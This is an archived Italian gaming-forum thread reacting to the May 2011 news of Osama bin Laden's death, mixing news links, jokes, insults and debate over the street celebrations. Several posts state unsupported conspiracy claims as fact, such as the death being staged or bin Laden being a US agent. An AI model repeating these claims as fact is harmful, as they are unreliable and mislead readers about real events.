View Full Version : Osama bin Laden is dead, sources say
NelloDominat
2nd May 2011, 05:03
CNN) -- Osama bin Laden is dead, sources told CNN Sunday night.
Congressional and administration sources say U.S. officials have the body of bin Laden, who was reportedly killed in Afghanistan. The details around his death were not immediately available.
U.S. President Barack Obama is expected to address the nation shortly.
By the CNN Wire Staff
May 1, 2011 11:01 p.m. EDT 3 minuti ffa :confused:
NelloDominat
2nd May 2011, 05:04
Source: http://www.cnn.com/ (streaming tra poco)
NelloDominat
2nd May 2011, 05:20
Live:
http://www.cnn.com/video/flashLive/live.html?stream=stream3&hpt=C1
saltaproc
2nd May 2011, 06:08
:hm::hm::hm:
Slurpix
2nd May 2011, 06:39
http://www.repubblica.it/esteri/2011/05/02/news/ucciso_bin_laden-15648338/?ref=HREA-1
:nod:
www.topolino.com
Pare sia stato Paperinik... :confused:
P.S.
Ma ha droppato? :drool:
Slurpix
2nd May 2011, 08:05
bah
lo dovevano catturare, non uccidere, cosi lo fanno un martire (cit.) :confused:
Era meglio catturarlo, ma pazienza. Bene cosi.
ilsagola
2nd May 2011, 08:44
:rotfl::rotfl::rotfl::rotfl:
Pic STK
2nd May 2011, 08:47
Morto un bin laden se ne fa un altro...
Dr.Doomed
2nd May 2011, 09:03
"la Repubblica", "Corriere", "il Giornale": foto del morto in prima pagina, manco rotten ormai lo fa.. non siamo poi cosi` diversi da sti talebani.
Bel colpo per gli americani, comunque: altro nobel per la Pace incoming per Obama?
Dryden
2nd May 2011, 09:07
A me quella foto pare un pò tanto fake.
NickZip
2nd May 2011, 09:10
http://images.corriereobjects.it/gallery/Esteri/2011/05_Maggio/binladen-festa/1/img_1/festa_19_672-458_resize.jpg
OOOOOOOH!
IU ES EI!
IU ES EI!
IU ES EI!
Quello che è andato a festeggiare sotto la casa bianca vestito da Hulk Hogan è un mito. :nod:
Dr.Doomed
2nd May 2011, 09:21
http://beardcoach.com/wp-content/uploads/2010/10/Hacksaw-Jim-Duggan.jpg
Ad ogni modo penso Osama fosse avanti di 3/4000 prima di questo abbandono per infortunio...
DiamondK
2nd May 2011, 09:27
mi sembrano un pò eccessivi tutti sti festeggiamenti, domani prenderà tutto in mano Been Laden e si ricomincia :nod:
Bortas
2nd May 2011, 09:42
UNo di meno, ora aspettiamo a vedere come si vendicheranno...
saltaproc
2nd May 2011, 09:45
Sepolto in mare? Wtf?
Ipnotik
2nd May 2011, 10:07
A me quella foto pare un pò tanto fake.
http://www.repubblica.it/esteri/2011/05/02/foto/tv_pachistana_ecco_il_volto_di_bin_laden-15651222/1/
ma parecchio fake....
Comunque bello sbattere la foto del morto in prima pagina con la frase da epic win di Obama " GIUSTIZIA E' FATTAH! ABBIAMO SALVATO IL MONDOH! " senza contare che proprio per questa morte lui sara' rimpiazzato da un altro tipo in 1 giorno e nasceranno nuove cellule di al quaeda spinti proprio dalla morte di bin laden.
Questa guerra faila sempre di piu'...LA ESPORTIAMO NOI LA DEMOCRAZIA SISI
Mosaik
2nd May 2011, 10:12
http://www.repubblica.it/esteri/2011/05/02/foto/tv_pachistana_ecco_il_volto_di_bin_laden-15651222/1/
ma parecchio fake....
Comunque bello sbattere la foto del morto in prima pagina con la frase da epic win di Obama " GIUSTIZIA E' FATTAH! ABBIAMO SALVATO IL MONDOH! " senza contare che proprio per questa morte lui sara' rimpiazzato da un altro tipo in 1 giorno e nasceranno nuove cellule di al quaeda spinti proprio dalla morte di bin laden.
Appunto è tutto calcolato sperano che cosi' esca un altro nemico da combattereehhh
Adoro i complotti :sneer:
Hagnar
2nd May 2011, 10:13
Dicono che ormai svolgesse un ruolo marginale all'interno di Al Qaeda ...
Darkmind
2nd May 2011, 10:16
mah dicevano che Bin Laden avesse un botto di sosia, non so come possano essere cosi sicuri di aver preso quello "vero".
A ogni modo, non penso che il mondo mussulmano se ne rimarrà con la mani in mano e userà sicuramente questo evento
a suo vantaggio. Insomma, Osama morto o meno, cambierà poco niente.
Ipnotik
2nd May 2011, 10:32
Berlusconi: «Un grande risultato nella lotta contro il male».
IL MALEH! :shocked:
Necker
fake foto all'ennesima potenza, ha la stessa identica espressione da morto cher aveva nelle foto in cjui era vivo. Sosia o non sosia, han preso la foto da vivo e l'han ritoccata per farlo diventare morto. Tentativo piuttosto maldestro direi. Com'è maldestro il tentativo di sbarazzarsi subito delle prove paventando l'esame del DNA ma seppellendo la salma in mare per mettere subito eventuali scettici a tacere :sneer:
Comunque, che sia realmente morto o solo una finta, hanno comunque fornito il pretesto a tutti i fondamentalisti del cazzo per rialzare la tensione verso gli USA e l'ooccidente in generale. Senza considerare che di seguaci pronti a prendere le redini e se possibile di scatenarsi pure di più ce ne saranno a vagonate.
Gli ammerigani che festeggiano x le strade peggio di quanto abbiamo fatto noi per i mondiali 2006 sono tristi parecchio.
Slurpix
mah dicevano che Bin Laden avesse un botto di sosia, non so come possano essere cosi sicuri di aver preso quello "vero".
A ogni modo, non penso che il mondo mussulmano se ne rimarrà con la mani in mano e userà sicuramente questo evento
a suo vantaggio. Insomma, Osama morto o meno, cambierà poco niente.
:hm:
dna??
jamino
2nd May 2011, 10:38
Per me è un risultato che ha un valore unicamente simbolico per gli americani. Prenderlo 10 anni dopo l'11 settembre da un punto di vista operativo cambia poco o nulla. ormai l'estremismo islamico è vfortemtne radicato in diversi paesi del medio oriente e dell'africa, per non parlare delle possibili infiltrazioni in europa.
holysmoke
2nd May 2011, 10:41
ancora con sto bin laden??? -.-
dariuz
2nd May 2011, 11:09
non penso che rischino il troll di un fake con la possibilità che salti fuori un video random che dimostri il contrario, sai che risate poi :nod:
rehlbe
2nd May 2011, 11:13
boh la foto da effettivamente da pensare.... così come il fatto che gli abbiano sparato, no dico dopo 2 mesi di pianificazione non potevano catturarlo vivo e portarlo in patria per poi giustiziarlo al momento opportuno un pò come fece cesare con vercingetorige? :sneer:
Slurpix
2nd May 2011, 11:22
immagino che osama e il suo seguito nn aspettasse altro che venire catturati, magari lasciando la porta aperta e con le pistole ad acqua sotto il braccio -.-
se gli han sparato probabilmente ci sarà stato un conflitto a fuoco e c'è rimasto secco, pure Dr.Snake e l'alfa team a volte missavano la missione :sneer:
rehlbe
2nd May 2011, 11:26
ma dai su se le cose stanno come raccontano e son due mesi che pianificano l'attacco i casi son due: o l'hanno voluto ammazzare, o era già defunto da tempo e quindi era necessario che morisse di nuovo... l'errore non è contemplabile, gli uomini meglio addestrati al mondo, la migliore tecnologia, il tempo per pianificare il tutto e non era in una fortezza era in un cazzo di appartamento..
Necker
2nd May 2011, 11:33
comunque sia si può passare una settimana a congetturare ma la realtà è che non si saprà mai un tubo.
Il Nando
2nd May 2011, 11:36
Appunto è tutto calcolato sperano che cosi' esca un altro nemico da combattereehhh
Adoro i complotti :sneer:
Beh uddio non è che gli ammeriggani nn abbiano mai mistificato un fatto eh...
In genere, la storia insegna, se ammazzi il tuo nemico pubblico nr 1 la prima cosa che fai è mostrare il cadavere, non gettarlo ai pesci. Vedi Ettore, Mussolini, Che-Guevara etc
Certo è che una notizia del genere, vera o falsa che sia, può cambiare la rotta degli usa. Sempre che non esca un video di bin laden con in mano il NYT di domani, che si smena la ciolla davanti alla telecamera fino a spruzzare sulla bandiera americana e il tutto sghignazzando mentre canticchia popoppopoppopooo
Darkmind
2nd May 2011, 11:37
:hm:
dna??
appunto se lo hanno preso ieri quando avrebbero fatto il test?
non si hanno dei tempi tecnici di almeno 24h?
jamino
2nd May 2011, 11:41
Alcune info prese da un forum yankee che frequeto per alti motivi:
1) che la foto sia una fake l'ha affermato anche un portavoce del pentagono secondo una notizia riportata da una rete USA (tipo fox news o cnn non ricordo)
2) pare che il corpo sia gia stato "sepolto in mare" questo per 2 motivi: a) non fare della tomba un luogo di culto; b) la sepoltura per i mussulmani va fatta entro 24 ore dalal morte;
3) per me l'esecuzione è stata una scelta. Un processo a Bin laden avrebbe causato molti più problemi che vantaggi. rischi di azioni terroristiche per liberarlo, una tribuna da cui fare dichiarazioni scomode etc.
4) secondo me sono anni che gli usa sanno dove trovarlo. Essenzialemnte non gli fregava niulal di prenderlo. Obama si è giocato il Jolly per la rielezione in un momento incui era in fortisisma crisi di consensi.
NickZip
2nd May 2011, 11:44
Gli ammerigani che festeggiano x le strade peggio di quanto abbiamo fatto noi per i mondiali 2006 sono tristi parecchio.
Mi verrebbe da pralinarti di insulti, ma mi limiterò a chiederti perché dovrebbero essere "tristi".
Dr.Doomed
2nd May 2011, 12:03
appunto se lo hanno preso ieri quando avrebbero fatto il test?
non si hanno dei tempi tecnici di almeno 24h?
Eh, c'era Grissom con il suo team nella task-force, tuttoapposto! :nod:
Necker
2nd May 2011, 12:11
Mi verrebbe da pralinarti di insulti, ma mi limiterò a chiederti perché dovrebbero essere "tristi".
anch'io vorrei che tu fossi cerebralmente normodotato ma ahimè non mi è andata bene e tocca risponderti pure, che cazzo c'è da festeggiare per un evento che non potrà far altro che causare ulteriori problemi?
Mettersi a festeggiare arrivando a scendere per le strade per la morte di un mister X, ritengo sia un atto profondamente becero e idiota a prescindere. Se non ci arrivi da solo non so che dirti, questione di cultura.
Strabo
2nd May 2011, 12:14
Osama is Dead 2
http://www.unconfirmedsources.com/?itemid=1927
Guarda come somiglia la foto di Osama morto ai tempi dello scimmione presidente a quella pubblicata oggi.... bah
Warbarbie
2nd May 2011, 12:17
Bello come siamo anche tutti un pò agenti segreti, un po navy seals, ed anche un pochino esperti di politica estera e terrorismo internazionale
Kadmillos
2nd May 2011, 12:20
Alcune info prese da un forum yankee che frequeto per alti motivi:
1) che la foto sia una fake l'ha affermato anche un portavoce del pentagono secondo una notizia riportata da una rete USA (tipo fox news o cnn non ricordo)
2) pare che il corpo sia gia stato "sepolto in mare" questo per 2 motivi: a) non fare della tomba un luogo di culto; b) la sepoltura per i mussulmani va fatta entro 24 ore dalal morte;
3) per me l'esecuzione è stata una scelta. Un processo a Bin laden avrebbe causato molti più problemi che vantaggi. rischi di azioni terroristiche per liberarlo, una tribuna da cui fare dichiarazioni scomode etc.
4) secondo me sono anni che gli usa sanno dove trovarlo. Essenzialemnte non gli fregava niulal di prenderlo. Obama si è giocato il Jolly per la rielezione in un momento incui era in fortisisma crisi di consensi.
This!
Se non erro però il funerale e intombamento deve avvenire entro 3 giorni e non entro 24 ore.
Non potevano e non dovevano prenderlo vivo , OSAMA avrebbe potuto sputtanare non si sa quante merdate fatte dagli USA in afghanistan negli ultimi 40anni, ricordatevi che la maggioranza delle teste di AlQuaeda sono state addestrate con sistemi "ammerecani" e che pare che anche OSAMA per un certo periodo di tempo si sia fatto le ossa in una certa base in Florida (come Noriega prima di lui e tanti altri).
Ho dato un occhiata in giro su alcuni forum americani , a quanto pare la missione è stata svolta dal JSOC (quindi non solo NS) e nello specifico la famigerata TF373 , in definitiva si tratta di un gruppo di militari di altissimo profilo che ha ricevuto l'incarico di pacificare determinate zone , sono tutti provenienti dai principali corpi d'elitè USA, diciamo che il credit iniziale è andato ai NavySeals (team SIX) per semplicità e comodità , ma resta improbabile che ci fosse un coinvolgimento esclusivo , perdipiù leggevo che l'attacco ha richiesto l'intervento di 40 uomini (il team SIX sono 24 uomini operativi più il supporto percui non erano presenti solo loro , sempre che loro ci fossero) secondo qualche analista (più intelligente di me) è un operazione gestita dalla cosidetta Disney Company (SFOD Delta) anche se a tutt'oggi non esiste ufficialmente nessuna unità che possa essere ricondotta a quella definizione (gli SFOD sono due , Delta non esiste e si tratta di distaccamenti di sussistenza).
Ho visto sul tubo un filmato breve della zona dove è avvenuto lo scontro , sinceramente , non è una fortezza, però cazzo non è neanche facile...
NickZip
2nd May 2011, 12:21
...
Ahahaha ok hai ragione te! :rotfl:
Strabo
A me ha fatto sorridere, onestamente... Riesumare una fotaccia photoshoppata e metterla come notizione... Non è questione di essere agenti segreti, basta google...
holysmoke
Bello come siamo anche tutti un pò agenti segreti, un po navy seals, ed anche un pochino esperti di politica estera e terrorismo internazionale
è un classico ormai dei tuttologi da forum nn lo sai?
Warbarbie
2nd May 2011, 12:23
Sembra anche che il famoso allunaggio sia una invenzione degli americani :nod:
jamino
2nd May 2011, 12:26
E se no che ci si scrive a fare nella sezione news del forum su un giochillo??? :oro:
Warbarbie
2nd May 2011, 12:28
E se no che ci si scrive a fare nella sezion news del forum su un giochillo???
Ma infatti finchè si fanno supposizioni va anche tutto bene, è quando si passa allo step "ma che cazzo stai a di senti a me che te spiego io come è andata veramente" che diventa fun la cosa
Necker
2nd May 2011, 12:31
Ahahaha ok hai ragione te! :rotfl:
con te ci vuole anche poco...fòra dai ball. :sneer:
holysmoke
2nd May 2011, 12:33
http://images2.corriereobjects.it/Media/Foto/2011/05/02/shop_big.jpg?v=201105021210
:rotfl:
Alkabar
2nd May 2011, 12:37
Ok, è morto un uomo. Fine.
Necker
2nd May 2011, 12:48
http://www.corriere.it/esteri/11_maggio_02/foto-osama-vero-falso_209f8cd6-749a-11e0-a12f-3a82d10cc9fa.shtml
ok hanno ammesso che la foto è un fake. Ma non penso che andranno oltre, o Obama non si sarebbe sbilanciato cosi tanto.
Quindi alla fin fine, dicono che è morto ma non lo si può provare. Anche se c'hanno provato facendo i furbacchioni con photoshop.
Warbarbie
2nd May 2011, 12:49
Beh in verità è morto un simbolo più che un semplice uomo
Che non sia un colpo al terrorismo in termini di guida e organizzazione potrebbe anche essere vero in base a chi lo vuole ai margini da un po', però è sicuramente un atto molto significativo per quanto riguardo quello che Bin Laden rappresentava
saltaproc
2nd May 2011, 12:50
www.youtube.com/watch?v=0YOh-rpvjYg
(CIT.)
Malbrouk
2nd May 2011, 12:55
mi meraviglio non sia stato postato prima:
http://video.libero.it/app/play?id=fa7af1c7a069c5e226aefee4a7c21ccb
Ipnotik
2nd May 2011, 12:59
http://www.cadoinpiedi.it/2011/05/02/ucciso_bin_laden.html
gran bell'articolo
Cmq non so se l'hanno già scritto ma...
Cosa possono fare gli americani quando la rete della ps3 è down :sneer:
NickZip
2nd May 2011, 13:22
con te ci vuole anche poco...fòra dai ball. :sneer:
Si cerco di non perdere più troppo tempo con i casi umani da forum, errore mio la domanda iniziale.
Hardcore
2nd May 2011, 14:11
obama@whitehouse:~$ sudo chmod +x /bin/laden
Necker
2nd May 2011, 14:19
Si cerco di non perdere più troppo tempo con i casi umani da forum, errore mio la domanda iniziale.
l'unico caso umano qua sei tu che arrivi, rompi i coglioni per il gusto di beccarti 5 minuti di attenzione e poi svanisci come una scoregia nel vento, essendo dopotutto aria di merda il tenore ed i contenuti dei tuoi reply. :wave:
Alkabar
2nd May 2011, 14:30
Minchia che acidità oggi.
Necker
2nd May 2011, 14:37
:sneer: mi sto solo schiarendo un pò la gola..
Alkabar
2nd May 2011, 14:44
:sneer: mi sto solo schiarendo un pò la gola..
Cioè scrivi con l'ugula sulla tastiera? Epico...
Pensa che Sturma scrive col culo e pensa te quando si "schiarisce".....
Necker
2nd May 2011, 16:14
NelloDominat
2nd May 2011, 16:15
http://26.media.tumblr.com/tumblr_lkjy3g9Wq31qabtryo1_500.jpg
ilsagola
2nd May 2011, 16:17
http://26.media.tumblr.com/tumblr_lkjy3g9Wq31qabtryo1_500.jpg
:sneer:
Marphil
2nd May 2011, 16:55
Ora si che il mondo cambierà :nod:
Bakaras
2nd May 2011, 17:16
non ve sta mai bene un cazzo :)
Alkabar
2nd May 2011, 17:28
Se quel detto fosse "non vi sta mai bene una figa", qualche volta sarebbe anche sbagliato :rotfl::rotfl::rotfl::rotfl:
Non ci sta bene perchè non c'è niente da esultare. E' morto il tizio che faceva i proclami in tv. Cioè il CEO di Alqaida insomma :rotfl::rotfl::rotfl:. Ma Alqaida sta ancora la...
E comunque tutta sta storia è nata male fin dagli anni 80.
Marphil
2nd May 2011, 18:42
A starmi bene mi sta bene, quello che trovo esagerato sono tutti sti festeggiamenti degli americani, manco fosse stato sconfitto il male nel mondo :nod:
Morto un papa se ne fa un altro non ce lo dimentichiamo.
Malbrouk
2nd May 2011, 18:43
ma mi dessero una prova
http://www.facebook.com/pages/Morto-anche-Gheddafi-Ecco-la-foto/221015044575299
ma mi dessero una prova
http://www.facebook.com/pages/Morto-anche-Gheddafi-Ecco-la-foto/221015044575299
http://www.ansa.it/web/notizie/rubriche/speciali/2011/05/02/visualizza_new.html_875570582.html
poi è sempre da verificare chi ha fatto l'esame del dna ... è una questione cheva in loop..
NickZip
2nd May 2011, 20:09
l'unico caso umano qua sei tu che arrivi, rompi i coglioni per il gusto di beccarti 5 minuti di attenzione e poi svanisci come una scoregia nel vento, essendo dopotutto aria di merda il tenore ed i contenuti dei tuoi reply. :wave:
Rompo i coglioni?
Cioè tu te ne esci con "che tristi quelli in america che festeggianoh! :dumbnod: " e, dopo aver offeso praticamente for free, hai anche il coraggio di dire che sarei IO quello che cerca 5 minuti di attenzione?
Ma va ad expare su daoc va, che impieghi sicuramente meglio la tua vita facendo mob piuttosto che non parlando di fatti.
DonZaucker
2nd May 2011, 20:16
E' vero che gli americani son troppo invasati cmq, leggo il commento di una mia amica su fb "avrei voluto essere il Seal che gli ha sparato. Due colpi in testa, siii vorrei abbracciare quel Seal" :afraid:
Ma va ad expare su daoc va, che impieghi sicuramente meglio la tua vita facendo mob piuttosto che non parlando di fatti.
Paladino saraceno e abbiamo detto tutto :sneer:
Alkabar
2nd May 2011, 22:03
Rompo i coglioni?
Cioè tu te ne esci con "che tristi quelli in america che festeggianoh! :dumbnod: " e, dopo aver offeso praticamente for free, hai anche il coraggio di dire che sarei IO quello che cerca 5 minuti di attenzione?
L'uccisione di un nemico non è una roba da festeggiare per strada facendo schiamazzi. Ce l'hanno messo li gli americani per di piu' la. L'unica reazione adeguata era: silenzio e non ripetere mai piu' l'errore di creare mostri come Osama.
Malbrouk
3rd May 2011, 00:03
http://www.ansa.it/web/notizie/rubriche/speciali/2011/05/02/visualizza_new.html_875570582.html
poi è sempre da verificare chi ha fatto l'esame del dna ... è una questione cheva in loop..
ma infatti mi possono pure dire "peeeeeh ci sono le armi chimiche in iraq noi ci abbiamo le proveh! il dna delle armi chimiche!" però posso fidarmi?
capisco il valore di una foto o di un video, senza manco affrontare il discorso cattura, è relativo tra sosia e cg però "lo abbiamo ucciso, abbiamo fatto le prove del dna però poi l'abbiamo buttato in mare" mi pare un po' poco, pure al che fecero le foto e non era sto gran nemico pubblico
sarà morto o in qualche cella sotto terra, perché mi auguro non rischino una figura di merda di tale portata, però cmq aspetto qualche prova più concreta
Ma che poi seal non vuol dire "foca"?
BlackCOSO
3rd May 2011, 09:11
si ....vabbe è un corpo della marina ..non potevano chiamarli Navy Capriolo :sneer:
Continuano a chiamarli uomini-rana che al più sono reparti speciali francesi.
L'uccisione di un nemico non è una roba da festeggiare per strada facendo schiamazzi. Ce l'hanno messo li gli americani per di piu' la. L'unica reazione adeguata era: silenzio e non ripetere mai piu' l'errore di creare mostri come Osama.
fortuna che al mondo qualcuno che ragiona bene c'è ancora... cosa cazzo c'è da festeggiare non lo so proprio. Il mondo sta andando a rotoli, l'america in primis, e c'è pure gente che festeggia per sta stronzata, bho
io a festeggiare per strada ci sarei andato :nod: -se uscissi di casa, cmq il concetto è quello-
Hardcore
3rd May 2011, 10:37
SEa Air Land ..................................
si allenano al polo sud ammazzando i cuccioli coi bastoni ...
Necker
3rd May 2011, 12:07
A starmi bene mi sta bene, quello che trovo esagerato sono tutti sti festeggiamenti degli americani, manco fosse stato sconfitto il male nel mondo :nod:
Morto un papa se ne fa un altro non ce lo dimentichiamo.
fortuna che al mondo qualcuno che ragiona bene c'è ancora... cosa cazzo c'è da festeggiare non lo so proprio. Il mondo sta andando a rotoli, l'america in primis, e c'è pure gente che festeggia per sta stronzata, bho
e occhio però a dirlo, potrebbe poppare un coglione a "pralinarvi di insulti" :sneer:
Mosaik
3rd May 2011, 12:15
FEsteggiano perche' hanno sconfitto il loro nemico numero 1 non mi sembra ci sia tanto da discutere su questo.
Si però mosa era dal '45 che non si vedeva nessuno esultare per la morte di qualcuno in occidente .
Tolti i futuri festeggiamenti per la morte di berlusconi ovviamente...
io sono coerente. Sono pro piazzale loreto e pro festeggiamenti per bin laden. Gli altri evidentemente la pensano come cicchitto :nod:
ah il nemico n° 1 degli USA era bin laden? pensavo fossero le migliaia di cellule terroristiche sparse per il mondo e i vari stati con cui sono in guerra, pensa te
meno male che hanno risolto tutti i problemi
ilsagola
3rd May 2011, 12:28
ah il nemico n° 1 degli USA era bin laden? pensavo fossero le migliaia di cellule terroristiche sparse per il mondo e i vari stati con cui sono in guerra, pensa te
meno male che hanno risolto tutti i problemi
io festeggerei in piazza per questo :look:
innaig86
3rd May 2011, 12:29
Ma il premio Nobel per la Pace che dà l'ordine di ucciderlo e non quello di catturarlo?
Alkabar
3rd May 2011, 13:08
FEsteggiano perche' hanno sconfitto il loro nemico numero 1 non mi sembra ci sia tanto da discutere su questo.
Festeggiano perchè sono dei bigotti nazionalisti e guerrafondai, quindi non ci arrivano che tutto sto casino è colpa anche loro e che Osama è il risultato delle loro campagna militari di sto cazzo. Non ho sentito nessuno in Europa festeggiare e spero che resti cosi'.
Necker
3rd May 2011, 13:14
non penso si possa paragonare Mussolini con Bin Laden...
Warbarbie
3rd May 2011, 14:15
Festeggiano perchè è morto uno che gli ha buttato giù 2 grattacieli con degli aerei di linea dentro casa.
Oh non mi sembra sia così difficile da capire
Ipnotik
3rd May 2011, 14:19
Festeggiano perchè è morto uno che gli ha buttato giù 2 grattacieli con degli aerei di linea dentro casa.
io sarei stato piu' felice se fosse stato catturato, processato e condannato anche perche' avremmo avuto modo di conoscere la verita' degli avvenimenti e avremmo potuto mettere fine a tutte le teorie complottistiche. Cosi' invece lui e' morto, Al Quaeda e' ancora piu' forte, la verita' la decidono gli USA da soli, le teorie complottistiche si moltiplicano.
Necker
3rd May 2011, 14:20
infatti l'abbiamo capito tutti che festeggiano x quella motivazione. Ciò che fa discutere è l'atto del festeggiamento in sè, specie con l'enfasi da finale dei campionati mondiali che dovrebbe quantomeno far riflettere un attimino di più. E su questo vedo che ancora in molti non l'hanno capita o non la vogliano capire.
Il concetto di scendere in strada e darsi alla pazza gioia può essere condivisibile per un grande evento positivo, non certo per la morte di uno stronzo. Vediamo se cosi è più chiaro.
brumbrum
3rd May 2011, 14:20
io sarei stato piu' felice se fosse stato catturato, processato e condannato anche perche' avremmo avuto modo di conoscere la verita' degli avvenimenti e avremmo potuto mettere fine a tutte le teorie complottistiche. Cosi' invece lui e' morto, Al Quaeda e' ancora piu' forte, la verita' la decidono gli USA da soli, le teorie complottistiche si moltiplicano.
se lo avessero catturato, poi parlava
Alkabar
3rd May 2011, 14:33
Beh, con la stessa logica quando loro festeggiano per aver fatto fuori dei soldati americani che per altro ammazzano civili a cazzo di cane, allora fanno bene.
Mosaik
3rd May 2011, 14:35
Tolti i futuri festeggiamenti per la morte di berlusconi ovviamente...
Ma il premio Nobel per la Pace che dà l'ordine di ucciderlo e non quello di catturarlo?
E' stata un'operazione militare , pensi che come sono entrati lui si è arreso e buttato a terra ?
Sai non è proprio facile catturare chi ti punta una pistola contro e usa una donna come scudo
Il concetto di scendere in strada e darsi alla pazza gioia può essere condivisibile per un grande evento positivo, non certo per la morte di uno stronzo. Vediamo se cosi è più chiaro.
Secondo me è più da idioti andare a festeggiare per 12 fessi che hanno tirato una palla in porta ma sono punti di vista :)
saltaproc
3rd May 2011, 14:37
Secondo me è più da idioti andare a festeggiare per 12 fessi che hanno tirato una palla in porta ma sono punti di vista :)
Sono 11:sneer:
Alkabar
3rd May 2011, 14:38
E' stata un'operazione militare , pensi che come sono entrati lui si è arreso e buttato a terra ?
Sai non è proprio facile catturare chi ti punta una pistola contro e usa una donna come scudo
Mosaik, loro festeggiano come sei i problemi dell'america fossero finiti. Hanno tutto il mio disprezzo a questo punto del gioco.
Mosaik
Diamo merito anche all'allentatore :confused:
P.S.:Questo fa capire quanto seguo l'argomento :sneer:
Alkabar
Mosaik
3rd May 2011, 14:40
Mosaik, loro festeggiano come sei i problemi dell'america fossero finiti. Hanno tutto il mio disprezzo a questo punto del gioco.
Non credo penso piu' ad un discorso che Osama li aveva sfidati ed ora l'America ha vinto contro di lui.
Voleva distruggere l'america invece sono ancora li e ballano sul suo corpo.
Il senso penso sia questo :)
ecco un esempio :)
http://reggio24ore.netribe.it/reggio24ore/immagini_jwm/2011/5/obama1_osama0.jpg
Warbarbie
3rd May 2011, 14:42
infatti l'abbiamo capito tutti che festeggiano x quella motivazione. Ciò che fa discutere è l'atto del festeggiamento in sè, specie con l'enfasi da finale dei campionati mondiali che dovrebbe quantomeno far riflettere un attimino di più. E su questo vedo che ancora in molti non l'hanno capita o non la vogliano capire.
La morte dello stronzo in questione è evidentemente un evento positivo per la folla festante nelle strade.
Anche riflettendoci un attimo di più continuo a non vederci nulla di scandaloso
Poi non capisco perchè ora Al Quaeda dovrebbe essere più forte di prima??
Nazgul Tirith
3rd May 2011, 14:42
Non credo penso piu' ad un discorso che Osama li aveva sfidati ed ora l'America ha vinto contro di lui.
Voleva distruggere l'america invece sono ancora li e ballano sul suo corpo.
Il senso penso sia questo :)
Mosa quando ti crepano migliaia di tuo cittadini non c'e una vittoria. Contando il fatto che era un attacco "previsto".
10.000 Vs 1.
Vince 10.000
E comunque...e' morto il CEO di un organizzazione terroristica come qualcuno ha detto. Loro ora hanno un ottimo pretesto per fare una futura strage gia preannucciata dalla CIA.
Che poi, Osama era un loro agente.
Saddam pure.
Diciamo che l'america i problemi se li e' sempre creati da sola :sneer:
Ps. Io mi ricordo l'indignazione di quando si vide mezzo medio-oriente festeggiare per strada mentre le torri gemelle bruciavano.
Ma indignazione per un folla festante per aver ucciso le pubbliche relazioni di un gruppo terroristico mica la vedo :nod:
E l'America non e' tanto diversa da un organizzazione terroristica per quello che ha fatto in tutta la sua storia e continuera' a fare. :rotfl:
@War Al Quaeda i soldi li prende dal petrolio. Dagli sceicchi. Morto un estremista pazzo se ne fa un altro. Ce ne sono tantissimi. Soprattutto se i pazzi di turno te li mette li l'america :rotfl:
Hardcore
3rd May 2011, 14:48
A me sinceramente vedere la gente in strada in festa ha ricordato i western col cattivo di turno appeso a un cappio. Con il cartello Wanted Dead or Alive.Sicuramente se Bin Laden è morto è perchè questo era l'ordine, dubito che i SEALS abbiano sbagliato.
Nazgul Tirith
3rd May 2011, 14:49
A me sinceramente vedere la gente in strada in festa ha ricordato i western col cattivo di turno appeso a un cappio. Con il cartello Wanted Dead or Alive.Sicuramente se Bin Laden è morto è perchè questo era l'ordine, dubito che i SEALS abbiano sbagliato.
Finche gli serviva...l'han sfruttato.
Quando non gli e' piu servito, han dato l'ordine e tolto di mezzo come e quando volevano.
ilsagola
3rd May 2011, 14:55
Finche gli serviva...l'han sfruttato.
Quando non gli e' piu servito, han dato l'ordine e tolto di mezzo come e quando volevano.
Diciamo quando gli serviva morto che è meglio
holysmoke
3rd May 2011, 15:02
se fanno un attentato ora per vendetta sul suolo americano voglio vedere poi chi ride... io di sicuro :nod:
Randolk
3rd May 2011, 15:13
http://a5.sphotos.ak.fbcdn.net/hphotos-ak-snc6/229645_222273307783493_126859533991538_988255_6006 936_n.jpg
innaig86
3rd May 2011, 15:14
Bauahauahauahauah
ilsagola
3rd May 2011, 15:17
Necker
3rd May 2011, 15:28
che minchiata... :D
Alkabar
3rd May 2011, 16:24
http://www.google.com/hostednews/afp/article/ALeqM5hqdk6Z817Td2BQdQXSJbeqRxqLFg?docId=CNG.763be 60251d148f36d94b0a2d31f1192.321
PEeeeeh, il nucleare, il nucleare.
5 tizi arrestati vicino a una centrale nucleare in UK.
Dr.Doomed
3rd May 2011, 16:55
http://www.google.com/hostednews/afp/article/ALeqM5hqdk6Z817Td2BQdQXSJbeqRxqLFg?docId=CNG.763be 60251d148f36d94b0a2d31f1192.321
PEeeeeh, il nucleare, il nucleare.
5 tizi arrestati vicino a una centrale nucleare in UK.
Vabbe`, questa e` un po' strumentale alka: anche un impianto idroelettrico costituisce una tentazione non indifferente per un terrorista.
Necker
3rd May 2011, 17:10
Vabbe`, questa e` un po' strumentale alka: anche un impianto idroelettrico costituisce una tentazione non indifferente per un terrorista.
ma forse anche di più, una centrale nucleare ha fin troppi sistemi di sicurezza, una idroelettrica, una volta sbriciolata la diga.. chi la ferma più l'acqua? ;)
questa è una minchiata bell'e buona, nello stesso comunicato ufficiale tipo la terza frase era "non abbiamo sconfitto alquaida"
per il resto uppo mosaik e lollo ai complottisti che sicuramente ora si stanno divertendo molto (come si erano divertiti dopo l'11 settembre poi)
poi lol nucleare, almeno le centrali nucleari sono sorvegliate, le dighe sono aperte a chiunque se domani volessi imbottirmi di dinamite e farmi una passeggiata su una diga random non ci sarebbe nessuno a fermarmi.
Alkabar
3rd May 2011, 18:00
questa è una minchiata bell'e buona, nello stesso comunicato ufficiale tipo la terza frase era "non abbiamo sconfitto alquaida"
per il resto uppo mosaik e lollo ai complottisti che sicuramente ora si stanno divertendo molto (come si erano divertiti dopo l'11 settembre poi)
poi lol nucleare, almeno le centrali nucleari sono sorvegliate, le dighe sono aperte a chiunque se domani volessi imbottirmi di dinamite e farmi una passeggiata su una diga random non ci sarebbe nessuno a fermarmi.
Per cosa festeggiano esattamente, allora ?
per avergli seccato il capo e il responsabile "morale" (noooo non era luiiii complooottoooo era un'altro ecc ecc). Il fatto che non abbiano nuclearizzato TUTTI i terroristi non implica che non sia possibile festeggiare la sconfitta di quello che era uno dei capoccia. Quando nuclearizzeranno anche gli altri, si festeggerà anche allora.
possiamo star qua a discutere sul buon gusto di festeggiare la morte di un uomo (facile fa i finocchi col culo degli altri, noi abbiamo festeggiato eccome a suo tempo), ma dire che pensano di aver risolto il problema è una cagata, basta leggere non dico gli articoli, ma anche solo i titoli dei giornali.
Alkabar
3rd May 2011, 18:19
